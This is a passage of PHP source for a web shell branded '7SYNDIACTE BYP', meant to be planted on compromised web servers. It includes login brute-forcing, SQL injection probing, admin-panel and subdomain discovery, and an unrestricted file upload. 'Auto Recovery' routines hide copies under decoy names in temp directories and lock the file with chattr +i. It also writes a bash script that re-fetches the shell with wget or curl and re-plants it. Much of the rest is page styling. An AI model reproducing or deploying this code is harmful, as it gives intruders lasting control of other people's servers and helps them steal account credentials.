                echo json_encode(['status' => 'success', 'result' => $result]);
            }
            exit;
            
        case 'bruteforce':
            $target = $_POST['target_url'] ?? '';
            $username = $_POST['username'] ?? 'admin';
            $wordlist = $_POST['wordlist'] ?? "admin\npassword\n123456\nroot\ntest";
            if (!empty($target)) {
                $result = bruteForcePHP($target, $username, $wordlist);
                echo json_encode(['status' => 'success', 'result' => $result]);
            }
            exit;
            
        case 'reverse_ip':
            $ip = $_POST['target_ip'] ?? '';
            if (!empty($ip)) {
                $result = reverseIPLookup($ip);
                echo json_encode(['status' => 'success', 'result' => $result]);
            }
            exit;
            
        case 'subdomain_scan':
            $domain = $_POST['target_domain'] ?? '';
            if (!empty($domain)) {
                $result = subdomainScan($domain);
                echo json_encode(['status' => 'success', 'result' => $result]);
            }
            exit;
            
        case 'cms_detect':
            $url = $_POST['target_url'] ?? '';
            if (!empty($url)) {
                $result = detectCMS($url);
                echo json_encode(['status' => 'success', 'result' => $result]);
            }
            exit;
            
        case 'admin_finder':
            $url = $_POST['target_url'] ?? '';
            if (!empty($url)) {
                $result = findAdminPanel($url);
                echo json_encode(['status' => 'success', 'result' => $result]);
            }
            exit;
    }
}

// Handle Auto Recovery actions
if (isset($_POST['recovery_action'])) {
    $action = $_POST['recovery_action'];
    $response = array('status' => 'error', 'message' => 'Unknown action');
    
    switch ($action) {
        case 'create_backup':
            $backup_path = '/tmp/.backup_shell_' . time() . '.php';
            if (copy(__FILE__, $backup_path)) {
                chmod($backup_path, 0644);
                $response = array('status' => 'success', 'message' => 'Backup created successfully at ' . $backup_path);
            } else {
                $response = array('status' => 'error', 'message' => 'Failed to create backup');
            }
            break;
            
        case 'restore_shell':
            $backup_files = glob('/tmp/.backup_shell_*.php');
            if (!empty($backup_files)) {
                $latest_backup = end($backup_files);
                if (copy($latest_backup, __FILE__)) {
                    $response = array('status' => 'success', 'message' => 'Shell restored from backup');
                } else {
                    $response = array('status' => 'error', 'message' => 'Failed to restore from backup');
                }
            } else {
                $response = array('status' => 'error', 'message' => 'No backup files found');
            }
            break;
            
        case 'hide_shell':
            $hidden_name = '.' . basename(__FILE__) . '_' . time();
            $hidden_path = dirname(__FILE__) . '/' . $hidden_name;
            if (copy(__FILE__, $hidden_path)) {
                chmod($hidden_path, 0644);
                $response = array('status' => 'success', 'message' => 'Hidden copy created at ' . $hidden_name);
            } else {
                $response = array('status' => 'error', 'message' => 'Failed to create hidden copy');
            }
            break;
            
        case 'clone_shell':
            $clone_locations = array(
                '/tmp/system_check.php',
                '/tmp/config_backup.php',
                '/tmp/maintenance.php',
                '/var/tmp/process.php',
                '/dev/shm/handler.php'
            );
            $success_count = 0;
            foreach ($clone_locations as $location) {
                if (copy(__FILE__, $location)) {
                    chmod($location, 0644);
                    $success_count++;
                }
            }
            $response = array('status' => 'success', 'message' => "Created {$success_count} clones successfully");
            break;
            
        case 'protect_shell':
            if (function_exists('exec')) {
                exec("chattr +i " . escapeshellarg(__FILE__) . " 2>&1", $output, $return_var);
                if ($return_var === 0) {
                    $response = array('status' => 'success', 'message' => 'Shell protected with immutable attribute');
                } else {
                    $response = array('status' => 'warning', 'message' => 'Protection attempt made (may require root)');
                }
            } else {
                $response = array('status' => 'error', 'message' => 'exec() function not available');
            }
            break;
            
        case 'generate_recovery':
            $recovery_script = '#!/bin/bash
# Auto Recovery Script for 7SYNDIACTE Shell
# Generated: ' . date('Y-m-d H:i:s') . '

SHELL_URL="http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . '"
BACKUP_DIR="/tmp"
SHELL_NAME="' . basename(__FILE__) . '"

echo "Starting recovery process..."

# Download original shell
wget -q "$SHELL_URL" -O "$BACKUP_DIR/$SHELL_NAME" || curl -s "$SHELL_URL" > "$BACKUP_DIR/$SHELL_NAME"

if [ -f "$BACKUP_DIR/$SHELL_NAME" ]; then
    echo "Shell downloaded successfully"
    chmod 755 "$BACKUP_DIR/$SHELL_NAME"
    
    # Create multiple copies
    cp "$BACKUP_DIR/$SHELL_NAME" "/var/tmp/system.php"
    cp "$BACKUP_DIR/$SHELL_NAME" "/tmp/config.php"
    cp "$BACKUP_DIR/$SHELL_NAME" "/dev/shm/process.php"
    
    echo "Recovery completed successfully"
else
    echo "Recovery failed - could not download shell"
fi
';
            $recovery_file = '/tmp/recovery_' . time() . '.sh';
            if (file_put_contents($recovery_file, $recovery_script)) {
                chmod($recovery_file, 0755);
                $response = array('status' => 'success', 'message' => 'Recovery script generated: ' . $recovery_file);
            } else {
                $response = array('status' => 'error', 'message' => 'Failed to generate recovery script');
            }
            break;
            
        case 'configure':
            $config = array(
                'backup_path' => $_POST['backup_path'] ?? '/tmp/.backup_shell',
                'monitor_interval' => $_POST['monitor_interval'] ?? 60,
                'recovery_method' => $_POST['recovery_method'] ?? 'instant'
            );
            $config_file = '/tmp/.recovery_config.json';
            if (file_put_contents($config_file, json_encode($config))) {
                $response = array('status' => 'success', 'message' => 'Recovery configuration updated');
            } else {
                $response = array('status' => 'error', 'message' => 'Failed to save configuration');
            }
            break;
    }
    
    header('Content-Type: application/json');
    echo json_encode($response);
    exit;
}

function performPortScan($host, $portRange) {
    $result = "Port scan results for $host:\n\n";
    $errno = 0;
    $errstr = '';
    
    if (strpos($portRange, '-') !== false) {
        list($start, $end) = explode('-', $portRange);
        $start = intval($start);
        $end = intval($end);
    } else {
        $ports = explode(',', $portRange);
        $start = $end = 0;
    }
    
    if ($start && $end) {
        for ($port = $start; $port <= min($end, $start + 100); $port++) {
            $connection = @fsockopen($host, $port, $errno, $errstr, 1);
            if ($connection) {
                $result .= "Port $port: OPEN\n";
                fclose($connection);
            }
        }
    } else {
        foreach ($ports as $port) {
            $port = intval(trim($port));
            $connection = @fsockopen($host, $port, $errno, $errstr, 1);
            if ($connection) {
                $result .= "Port $port: OPEN\n";
                fclose($connection);
            }
        }
    }
    
    return $result;
}

function encodeText($text, $type) {
    switch ($type) {
        case 'base64':
            return base64_encode($text);
        case 'url':
            return urlencode($text);
        case 'html':
            return htmlentities($text);
        case 'hex':
            return bin2hex($text);
        case 'rot13':
            return str_rot13($text);
        default:
            return $text;
    }
}

function decodeText($text, $type) {
    switch ($type) {
        case 'base64':
            return base64_decode($text);
        case 'url':
            return urldecode($text);
        case 'html':
            return html_entity_decode($text);
        case 'hex':
            return hex2bin($text);
        case 'rot13':
            return str_rot13($text);
        default:
            return $text;
    }
}

function generateHash($text, $type) {
    switch ($type) {
        case 'md5':
            return md5($text);
        case 'sha1':
            return sha1($text);
        case 'sha256':
            return hash('sha256', $text);
        case 'sha512':
            return hash('sha512', $text);
        default:
            return $text;
    }
}

function testSQLInjection($url, $payload) {
    $result = "SQL Injection Test Results:\n\n";
    $result .= "Target URL: $url\n";
    $result .= "Payload: $payload\n\n";
    
    // Add payload to URL parameters
    $testUrls = [
        $url . "?id=" . urlencode($payload),
        $url . "?user=" . urlencode($payload),
        $url . "?name=" . urlencode($payload),
        $url . "?search=" . urlencode($payload)
    ];
    
    foreach ($testUrls as $testUrl) {
        $response = @file_get_contents($testUrl);
        if ($response) {
            if (stripos($response, 'mysql') !== false || 
                stripos($response, 'sql syntax') !== false ||
                stripos($response, 'warning') !== false ||
                stripos($response, 'error') !== false) {
                $result .= "POTENTIAL VULNERABILITY FOUND: " . $testUrl . "\n";
            } else {
                $result .= "No obvious vulnerability: " . $testUrl . "\n";
            }
        } else {
            $result .= "No response from: " . $testUrl . "\n";
        }
    }
    
    return $result;
}

function bruteForcePHP($target, $username, $wordlist) {
    $result = "Brute Force Attack Results:\n\n";
    $result .= "Target: $target\n";
    $result .= "Username: $username\n\n";
    
    $passwords = explode("\n", trim($wordlist));
    
    foreach ($passwords as $password) {
        $password = trim($password);
        if (empty($password)) continue;
        
        $postData = "username=" . urlencode($username) . "&password=" . urlencode($password);
        
        $context = stream_context_create([
            'http' => [
                'method' => 'POST',
                'header' => "Content-type: application/x-www-form-urlencoded\r\n",
                'content' => $postData
            ]
        ]);
        
        $response = @file_get_contents($target, false, $context);
        
        if ($response && (stripos($response, 'welcome') !== false || 
                         stripos($response, 'dashboard') !== false ||
                         stripos($response, 'success') !== false)) {
            $result .= "SUCCESS: $username:$password\n";
            break;
        } else {
            $result .= "Failed: $password\n";
        }
        
        usleep(500000); // 0.5 second delay
    }
    
    return $result;
}

function reverseIPLookup($ip) {
    $result = "Reverse IP Lookup Results for $ip:\n\n";
    
    // Try to get hostname
    $hostname = gethostbyaddr($ip);
    $result .= "Hostname: " . ($hostname !== $ip ? $hostname : "No hostname found") . "\n\n";
    
    // Try to get additional info via nslookup
    $nslookup = shell_exec("nslookup " . escapeshellarg($ip));
    if ($nslookup) {
        $result .= "DNS Lookup:\n" . $nslookup . "\n";
    }
    
    return $result;
}

function subdomainScan($domain) {
    $result = "Subdomain Scan Results for $domain:\n\n";
    
    $subdomains = [
        'www', 'mail', 'ftp', 'admin', 'test', 'dev', 'staging', 'api', 'blog',
        'shop', 'forum', 'support', 'help', 'docs', 'login', 'secure', 'vpn',
        'remote', 'portal', 'app', 'mobile', 'beta', 'demo', 'cdn', 'static'
    ];
    
    foreach ($subdomains as $sub) {
        $subdomain = $sub . '.' . $domain;
        $ip = gethostbyname($subdomain);
        
        if ($ip !== $subdomain) {
            $result .= "Found: $subdomain -> $ip\n";
        }
    }
    
    return $result;
}

function detectCMS($url) {
    $result = "CMS Detection Results for $url:\n\n";
    
    $response = @file_get_contents($url);
    if (!$response) {
        return $result . "Unable to fetch URL content.\n";
    }
    
    $cmsSignatures = [
        'WordPress' => ['wp-content', 'wp-includes', '/wp-json/', 'wordpress'],
        'Joomla' => ['joomla', '/administrator/', 'com_content', 'JFactory'],
        'Drupal' => ['drupal', 'sites/default', 'node/', '/user/login'],
        'Magento' => ['magento', 'mage/errors', 'skin/frontend'],
        'PrestaShop' => ['prestashop', '/modules/', 'prestashop.com'],
        'OpenCart' => ['opencart', 'catalog/view', 'system/engine'],
        'TYPO3' => ['typo3', 'fileadmin', 'typo3conf']
    ];
    
    foreach ($cmsSignatures as $cms => $signatures) {
        foreach ($signatures as $signature) {
            if (stripos($response, $signature) !== false) {
                $result .= "Detected: $cms (signature: $signature)\n";
                break;
            }
        }
    }
    
    return $result;
}

function findAdminPanel($url) {
    $result = "Admin Panel Finder Results for $url:\n\n";
    
    $adminPaths = [
        'admin', 'administrator', 'admin.php', 'admin.html', 'login.php',
        'login.html', 'wp-admin', 'cpanel', 'control', 'panel', 'dashboard',
        'manage', 'management', 'admin/login', 'admin/index.php'
    ];
    
    $baseUrl = rtrim($url, '/');
    
    foreach ($adminPaths as $path) {
        $testUrl = $baseUrl . '/' . $path;
        
        $headers = @get_headers($testUrl);
        if ($headers && strpos($headers[0], '200') !== false) {
            $result .= "Found: $testUrl\n";
        }
    }
    
    return $result;
}

?>
<!DOCTYPE HTML>
<HTML>
<HEAD>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700;900&family=Racing+Sans+One&display=swap" rel="stylesheet">
<title>7SYNDIACTE BYP - Advanced Web Shell</title>
<link rel="icon" type="image/svg+xml" href="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzIiIGhlaWdodD0iMzIiIHZpZXdCb3g9IjAgMCAzMiAzMiIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPHJlY3Qgd2lkdGg9IjMyIiBoZWlnaHQ9IjMyIiByeD0iOCIgZmlsbD0idXJsKCNncmFkaWVudDApIi8+CjxkZWZzPgo8bGluZWFyR3JhZGllbnQgaWQ9ImdyYWRpZW50MCIgeDE9IjAlIiB5MT0iMCUiIHgyPSIxMDAlIiB5Mj0iMTAwJSI+CjxzdG9wIG9mZnNldD0iMCUiIHN0b3AtY29sb3I9IiNlMWIxMmMiLz4KPHN0b3Agb2Zmc2V0PSI1MCUiIHN0b3AtY29sb3I9IiNmZmQ3MDAiLz4KPHN0b3Agb2Zmc2V0PSIxMDAlIiBzdG9wLWNvbG9yPSIjZTFiMTJjIi8+CjwvbGluZWFyR3JhZGllbnQ+CjwvZGVmcz4KPHRleHQgeD0iMTYiIHk9IjIwIiB0ZXh0LWFuY2hvcj0ibWlkZGxlIiBmb250LWZhbWlseT0iT3JiaXRyb24sIG1vbm9zcGFjZSIgZm9udC13ZWlnaHQ9IjkwMCIgZm9udC1zaXplPSIxNCIgZmlsbD0iIzAwMCI+N1M8L3RleHQ+Cjwvc3ZnPgo=">
<style>
* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
}

body {
    font-family: "Orbitron", monospace;
    background: linear-gradient(135deg, #0d1117 0%, #1c2128 25%, #0d1117 50%, #1c2128 75%, #0d1117 100%);
    background-attachment: fixed;
    color: #e6e6e6;
    min-height: 100vh;
    overflow-x: auto;
    -webkit-text-size-adjust: 100%;
    -ms-text-size-adjust: 100%;
}

/* Mobile optimizations */
@media (max-width: 768px) {
    body {
        font-size: 14px;
        background-attachment: scroll;
    }
}

.main-header {
    background: linear-gradient(135deg, rgba(13, 17, 23, 0.95) 0%, rgba(28, 33, 40, 0.9) 100%);
    border-bottom: 2px solid #e1b12c;
    padding: 20px 0;
    box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);
    backdrop-filter: blur(10px);
}

.header-content {
    display: flex;
    justify-content: space-between;
    align-items: center;
    max-width: 1200px;
    margin: 0 auto;
    padding: 0 20px;
}

@media (max-width: 768px) {
    .main-header {
        padding: 15px 0;
    }
    
    .header-content {
        flex-direction: column;
        gap: 15px;
        padding: 0 15px;
    }
    
    .header-actions {
        width: 100%;
        justify-content: center;
    }
}

.logo-section {
    display: flex;
    align-items: center;
    gap: 15px;
}

.logo-7s {
    font-family: "Racing Sans One", cursive;
    font-size: 2.5rem;
    color: #e1b12c;
    text-shadow: 0 0 20px #e1b12c;
    font-weight: 900;
}

.shell-title {
    color: #fff;
    font-size: 1.2rem;
    font-weight: bold;
}

.shell-subtitle {
    color: #8b949e;
    font-size: 0.9rem;
}

.header-actions {
    display: flex;
    gap: 10px;
    align-items: center;
}

.btn-syndicate {
    background: linear-gradient(135deg, #e1b12c 0%, #ffd700 50%, #e1b12c 100%);
    color: #000;
    border: none;
    padding: 10px 20px;
    border-radius: 6px;
    font-family: "Orbitron", monospace;
    font-weight: bold;
    text-decoration: none;
    transition: all 0.3s ease;
    font-size: 0.9rem;
}

.btn-syndicate:hover {
    transform: translateY(-2px);
    box-shadow: 0 5px 15px rgba(225, 177, 44, 0.4);
    color: #000;
    text-decoration: none;
}

.main-container {
    max-width: 1200px;
    margin: 0 auto;
    padding: 20px;
}

@media (max-width: 768px) {
    .main-container {
        padding: 5px;
        max-width: 100%;
    }
    
    .container-fluid {
        padding: 5px;
    }
}

@media (max-width: 480px) {
    .main-container {
        padding: 2px;
    }
    
    .container-fluid {
        padding: 2px;
    }
}

.nav-tabs {
    border-bottom: 2px solid #e1b12c;
    margin-bottom: 20px;
    overflow-x: auto;
    white-space: nowrap;
    -webkit-overflow-scrolling: touch;
}

@media (max-width: 768px) {
    .nav-tabs {
        margin-bottom: 10px;
        padding-bottom: 0;
        border-bottom: 1px solid #e1b12c;
    }
    
    .nav-tabs .nav-item {
        display: inline-block;
        min-width: auto;
    }
}

.nav-tabs .nav-link {
    background: rgba(30, 30, 30, 0.6);
    border: 1px solid #555;
    color: #e6e6e6;
    font-family: "Orbitron", monospace;
    font-weight: bold;
    margin-right: 5px;
    margin-bottom: 0;
    border-radius: 8px 8px 0 0;
    transition: all 0.3s ease;
    min-height: 44px;
    display: flex;
    align-items: center;
    justify-content: center;
}

@media (max-width: 768px) {
    .nav-tabs .nav-link {
        font-size: 10px;
        padding: 6px 8px;
        margin-right: 2px;
        white-space: nowrap;
        min-height: 36px;
    }
}

@media (max-width: 480px) {
    .nav-tabs .nav-link {
        font-size: 9px;
        padding: 5px 6px;
        margin-right: 1px;
        min-height: 32px;
    }
}

.nav-tabs .nav-link:hover {
    background: rgba(225, 177, 44, 0.2);
    border-color: #e1b12c;
    color: #ffd700;
}

.nav-tabs .nav-link.active {
    background: #e1b12c;
    border-color: #e1b12c;
    color: #000;
}

.tab-content {
    background: rgba(13, 17, 23, 0.8);
    border: 2px solid #e1b12c;
    border-radius: 10px;
    padding: 20px;
    backdrop-filter: blur(10px);
}

@media (max-width: 768px) {
    .tab-content {
        padding: 10px;
        border-radius: 5px;
        border-width: 1px;
    }
}

@media (max-width: 480px) {
    .tab-content {
        padding: 8px;
        margin: 0 2px;
    }
}

.tool-grid {
    display: grid;
    grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
    gap: 15px;
    margin-bottom: 20px;
}

@media (max-width: 768px) {
    .tool-grid {
        grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
        gap: 10px;
        margin-bottom: 15px;
    }
}

@media (max-width: 480px) {
    .tool-grid {
        grid-template-columns: 1fr 1fr;
        gap: 8px;
    }
}

.tool-card {
    background: linear-gradient(135deg, rgba(30, 30, 30, 0.8) 0%, rgba(50, 50, 50, 0.6) 100%);
    border: 1px solid #555;
    border-radius: 8px;
    padding: 15px;
    cursor: pointer;
    transition: all 0.3s ease;
    text-align: center;
    min-height: 120px;
    display: flex;
    flex-direction: column;
    justify-content: center;
    touch-action: manipulation;
}

@media (max-width: 768px) {
    .tool-card {
        padding: 12px;
        min-height: 100px;
    }
}

@media (max-width: 480px) {
    .tool-card {
        padding: 10px;
        min-height: 90px;
    }
}

.tool-card:hover {
    border-color: #e1b12c;
    transform: translateY(-3px);
    box-shadow: 0 5px 15px rgba(225, 177, 44, 0.3);
}

.tool-icon {
    font-size: 2rem;
    color: #e1b12c;
    margin-bottom: 10px;
}

.tool-name {
    font-weight: bold;
    color: #fff;
    margin-bottom: 5px;
}

.tool-desc {
    font-size: 0.8rem;
    color: #8b949e;
}

.security-tools-container {
    display: none;
    margin-top: 20px;
}

.tool-form {
    background: rgba(20, 20, 20, 0.8);
    border: 1px solid #555;
    border-radius: 8px;
    padding: 20px;
    margin-bottom: 20px;
}

.form-group {
    margin-bottom: 15px;
}

.form-group label {
    display: block;
    margin-bottom: 5px;
    color: #e1b12c;
    font-weight: bold;
}

.form-control-tools {
    width: 100%;
    padding: 10px;
    background: rgba(30, 30, 30, 0.8);
    border: 1px solid #555;
    border-radius: 5px;
    color: #e6e6e6;
    font-family: "Courier New", monospace;
    min-height: 44px;
    font-size: 16px;
    -webkit-appearance: none;
}

@media (max-width: 768px) {
    .form-control-tools {
        padding: 12px;
        font-size: 16px;
    }
}

.form-control-tools:focus {
    outline: none;
    border-color: #e1b12c;
    box-shadow: 0 0 5px rgba(225, 177, 44, 0.3);
}

.btn-tool-action {
    background: linear-gradient(135deg, #e1b12c 0%, #ffd700 50%, #e1b12c 100%);
    color: #000;
    border: none;
    padding: 10px 20px;
    border-radius: 5px;
    font-family: "Orbitron", monospace;
    font-weight: bold;
    cursor: pointer;
    transition: all 0.3s ease;
    min-height: 44px;
    font-size: 14px;
    touch-action: manipulation;
}

@media (max-width: 768px) {
    .btn-tool-action {
        padding: 12px 16px;
        font-size: 14px;
        width: 100%;
        margin-bottom: 10px;
    }
}

.btn-tool-action:hover {
    transform: translateY(-2px);
    box-shadow: 0 3px 10px rgba(225, 177, 44, 0.4);
}

.tool-results {
    background: rgba(10, 10, 10, 0.9);
    border: 1px solid #333;
    border-radius: 5px;
    padding: 15px;
    margin-top: 15px;
    color: #e6e6e6;
    font-family: "Courier New", monospace;
    white-space: pre-wrap;
    max-height: 400px;
    overflow-y: auto;
}

.checkbox-group {
    display: flex;
    gap: 15px;
    flex-wrap: wrap;
}

.checkbox-group label {
    display: flex;
    align-items: center;
    gap: 5px;
    color: #e6e6e6;
    cursor: pointer;
}

.form-control-file {
    display: none;
}

pre {
    background: rgba(10, 10, 10, 0.9);
    border: 1px solid #333;
    border-radius: 5px;
    padding: 15px;
    color: #e6e6e6;
    overflow-x: auto;
    font-family: "Courier New", monospace;
}

.alert {
    border-radius: 5px;
    margin-bottom: 15px;
}

.alert-success {
    background: rgba(40, 167, 69, 0.2);
    border: 1px solid #28a745;
    color: #d4edda;
}

.alert-danger {
    background: rgba(220, 53, 69, 0.2);
    border: 1px solid #dc3545;
    color: #f8d7da;
}

.anonymous-3d {
    position: fixed;
    bottom: 20px;
    right: 20px;
    width: 100px;
    height: 120px;
    background: linear-gradient(135deg, #2d2d2d 0%, #1a1a1a 100%);
    border: 2px solid #e1b12c;
    border-radius: 10px;
    cursor: pointer;
    transition: all 0.3s ease;
    z-index: 1000;
    touch-action: manipulation;
}

@media (max-width: 768px) {
    .anonymous-3d {
        width: 80px;
        height: 100px;
        bottom: 15px;
        right: 15px;
    }
}

@media (max-width: 480px) {
    .anonymous-3d {
        width: 70px;
        height: 90px;
        bottom: 10px;
        right: 10px;
    }
}

.anonymous-3d:hover {
    transform: scale(1.1) rotateY(10deg);
    box-shadow: 0 10px 30px rgba(225, 177, 44, 0.4);
}

@media (max-width: 768px) {
    .anonymous-3d:hover {
        transform: scale(1.05);
    }
}

.anonymous-face {
    position: relative;
    width: 60px;
    height: 70px;
    margin: 15px auto 10px;
    background: #fff;
    border-radius: 50% 50% 45% 45%;
    border: 2px solid #000;
}

.anonymous-mask {
    position: absolute;
    top: 20px;
    left: 10px;
    width: 40px;
    height: 30px;
    background: #000;
    border-radius: 50% 50% 30% 30%;
}

.anonymous-eyes {
    position: absolute;
    top: 8px;
}

.eye {
    width: 8px;
    height: 8px;
    background: #fff;
    border-radius: 50%;
    position: absolute;
}

.eye.left { left: 8px; }
.eye.right { right: 8px; }

.anonymous-mouth {
    position: absolute;
    bottom: 8px;
    left: 50%;
    transform: translateX(-50%);
    width: 20px;
    height: 3px;
    background: #fff;
    border-radius: 2px;
}

.terminal-output {
    background: #000;
    color: #00ff00;
    padding: 15px;
    border-radius: 5px;
    font-family: "Courier New", monospace;
    max-height: 400px;
    overflow-y: auto;
    margin-top: 15px;
}

.custom-file {
    position: relative;
    display: inline-block;
    width: 100%;
    height: calc(1.5em + .75rem + 2px);
    margin-bottom: 0;
}

.custom-file-input {
    position: relative;
    z-index: 2;
    width: 100%;
    height: calc(1.5em + .75rem + 2px);
    margin: 0;
    opacity: 0;
}

.custom-file-label {
    position: absolute;
    top: 0;
    right: 0;
    left: 0;
    z-index: 1;
    height: calc(1.5em + .75rem + 2px);
    padding: .375rem .75rem;
    font-weight: 400;
    line-height: 1.5;
    color: #e6e6e6;
    background-color: rgba(30, 30, 30, 0.8);
    border: 1px solid #555;
    border-radius: .25rem;
    cursor: pointer;
}

.custom-file-label::after {
    position: absolute;
    top: 0;
    right: 0;
    bottom: 0;
    z-index: 3;
    display: block;
    height: calc(1.5em + .75rem);
    padding: .375rem .75rem;
    line-height: 1.5;
    color: #e6e6e6;
    content: "Browse";
    background-color: #e1b12c;
    border-left: inherit;
    border-radius: 0 .25rem .25rem 0;
    color: #000;
    font-weight: bold;
}

/* Mobile table responsiveness */
@media (max-width: 768px) {
    .table-responsive {
        -webkit-overflow-scrolling: touch;
    }
    
    .table td, .table th {
        padding: 8px 4px;
        font-size: 12px;
        white-space: nowrap;
    }
    
    .btn-group {
        flex-direction: column;
        width: 100%;
    }
    
    .btn-group .btn {
        margin-bottom: 2px;
        border-radius: 4px !important;
        font-size: 10px;
        padding: 4px 8px;
    }
    
    .row {
        margin-left: -5px;
        margin-right: -5px;
    }
    
    .row > [class*="col-"] {
        padding-left: 5px;
        padding-right: 5px;
        margin-bottom: 15px;
    }
}

/* Touch improvements */
@media (hover: none) {
    .tool-card:hover {
        transform: none;
        box-shadow: none;
    }
    
    .btn-tool-action:hover {
        transform: none;
    }
    
    .anonymous-3d:hover {
        transform: none;
    }
}

/* Modal responsiveness */
@media (max-width: 768px) {
    .modal-content {
        width: 95% !important;
        max-width: none !important;
        margin: 10px auto !important;
    }
    
    .modal textarea {
        height: 250px !important;
    }
}

/* Path display mobile optimization */
.current-path {
    margin-bottom: 15px;
    color: #e1b12c;
    font-weight: bold;
}

.path-text {
    word-break: break-all;
    color: #e6e6e6;
    font-family: "Courier New", monospace;
}

@media (max-width: 768px) {
    .current-path {
        font-size: 12px;
        margin-bottom: 10px;
        line-height: 1.4;
    }
    
    .path-text {
        display: block;
        margin-top: 5px;
        font-size: 11px;
        padding: 5px;
        background: rgba(30, 30, 30, 0.5);
        border-radius: 3px;
    }
}

@media (max-width: 480px) {
    .current-path {
        font-size: 11px;
    }
    
    .path-text {
        font-size: 10px;
        padding: 3px;
    }
}

/* Form and button mobile optimization */
.form-label-mobile {
    font-size: 12px;
    font-weight: bold;
    color: #e1b12c;
    margin-bottom: 5px;
    display: block;
}

.btn-mobile {
    width: 100%;
    margin-bottom: 10px;
}

@media (max-width: 768px) {
    .form-group {
        margin-bottom: 15px;
    }
    
    .form-label-mobile {
        font-size: 11px;
    }
    
    .form-control {
        font-size: 14px;
        padding: 10px;
    }
    
    .btn-sm {
        font-size: 11px;
        padding: 8px 12px;
    }
    
    .input-group-append .btn {
        padding: 10px 15px;
    }
    
    .col-md-4, .col-md-6 {
        margin-bottom: 15px;
    }
}

@media (max-width: 480px) {
    .form-label-mobile {
        font-size: 10px;
    }
    
    .form-control {
        font-size: 16px;
        padding: 12px;
    }
    
    .btn-sm {
        font-size: 10px;
        padding: 10px;
    }
}
</style>
</HEAD>
<BODY>

<header class="main-header">
    <div class="header-content">
        <div class="logo-section">
            <div class="logo-7s">7S</div>
            <div>
                <div class="shell-title">SYNDIACTE BYP</div>
                <div class="shell-subtitle">Advanced Web Shell v2.0</div>
            </div>
        </div>
        <div class="header-actions">
            <a href="https://t.me/7SYNDIACTE" class="btn-syndicate" target="_blank">
                <i class="fab fa-telegram"></i> 7SYNDIACTE
            </a>
            <a href="?logout=1" class="btn btn-danger btn-sm">
                <i class="fas fa-sign-out-alt"></i> Logout
            </a>
        </div>
    </div>
</header>

<div class="main-container">
    <ul class="nav nav-tabs" id="myTab" role="tablist">
        <li class="nav-item" role="presentation">
            <a class="nav-link active" id="files-tab" data-toggle="tab" href="#files" role="tab">
                <i class="fas fa-folder"></i> File Manager
            </a>
        </li>
        <li class="nav-item" role="presentation">
            <a class="nav-link" id="terminal-tab" data-toggle="tab" href="#terminal" role="tab">
                <i class="fas fa-terminal"></i> Terminal
            </a>
        </li>
        <li class="nav-item" role="presentation">
            <a class="nav-link" id="security-tab" data-toggle="tab" href="#security" role="tab">
                <i class="fas fa-shield-alt"></i> Security Tools
            </a>
        </li>
        <li class="nav-item" role="presentation">
            <a class="nav-link" id="network-tab" data-toggle="tab" href="#network" role="tab">
                <i class="fas fa-network-wired"></i> Network Tools
            </a>
        </li>
        <li class="nav-item" role="presentation">
            <a class="nav-link" id="recovery-tab" data-toggle="tab" href="#recovery" role="tab">
                <i class="fas fa-shield-virus"></i> Auto Recovery
            </a>
        </li>
        <li class="nav-item" role="presentation">
            <a class="nav-link" id="info-tab" data-toggle="tab" href="#info" role="tab">
                <i class="fas fa-info-circle"></i> System Info
            </a>
        </li>
    </ul>

    <div class="tab-content" id="myTabContent">
        <!-- File Manager Tab -->
        <div class="tab-pane fade show active" id="files" role="tabpanel">
            <h4 class="current-path"><i class="fas fa-folder-open"></i> Current Path: <span class="path-text"><?php echo htmlspecialchars($path); ?></span></h4>
            
            <div class="row mb-3">
                <div class="col-md-4">
                    <form method="POST" enctype="multipart/form-data" class="mb-3">
                        <div class="form-group">
                            <label>Upload File:</label>
                            <div class="custom-file mb-2">
                                <input type="file" name="file" id="fileUpload" class="custom-file-input" required>
                                <label class="custom-file-label" for="fileUpload" id="fileLabel">Choose file...</label>
                            </div>
                            <button type="submit" class="btn btn-warning btn-sm">
                                <i class="fas fa-upload"></i> Upload File
                            </button>
                        </div>
                    </form>
                </div>
                <div class="col-md-4">
                    <div class="form-group">
                        <label>Create New File:</label>
                        <input type="text" id="newFileName" class="form-control-tools" placeholder="filename.txt">
                        <button type="button" class="btn btn-success btn-sm mt-2" onclick="createFile()">
                            <i class="fas fa-file-plus"></i> Create File
                        </button>
                    </div>
                </div>
                <div class="col-md-4">
                    <div class="form-group">
                        <label>Create New Folder:</label>
                        <input type="text" id="newFolderName" class="form-control-tools" placeholder="foldername">
                        <button type="button" class="btn btn-primary btn-sm mt-2" onclick="createFolder()">
                            <i class="fas fa-folder-plus"></i> Create Folder
                        </button>
                    </div>
                </div>
            </div>
            
            <div class="row mb-3">
                <div class="col-md-12">
                    <form method="GET" class="mb-3">
                        <div class="form-group">
                            <label>Navigate to Path:</label>
                            <input type="text" name="path" value="<?php echo htmlspecialchars($path); ?>" class="form-control-tools">
                            <button type="submit" class="btn btn-info btn-sm mt-2">
                                <i class="fas fa-arrow-right"></i> Go
                            </button>
                        </div>
                    </form>
                </div>
            </div>

            <?php
            if (isset($_FILES['file']) && $_FILES['file']['error'] == 0) {
                $uploadPath = $path . '/' . $_FILES['file']['name'];
                if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadPath)) {
                    echo '<div class="alert alert-success">File uploaded successfully!</div>';
                } else {
                    echo '<div class="alert alert-danger">Upload failed!</div>';
                }
            }

            $scandir = @scandir($path);
            if ($scandir === false) {
                echo '<div class="alert alert-danger">Cannot access this directory.</div>';
            } else {
                echo '<div class="table-responsive">
                        <table class="table table-dark table-striped">
                        <thead>
                            <tr>
                                <th>Name</th>
                                <th>Type</th>
                                <th>Size</th>
                                <th>Permissions</th>
                                <th>Modified</th>
                                <th>Actions</th>
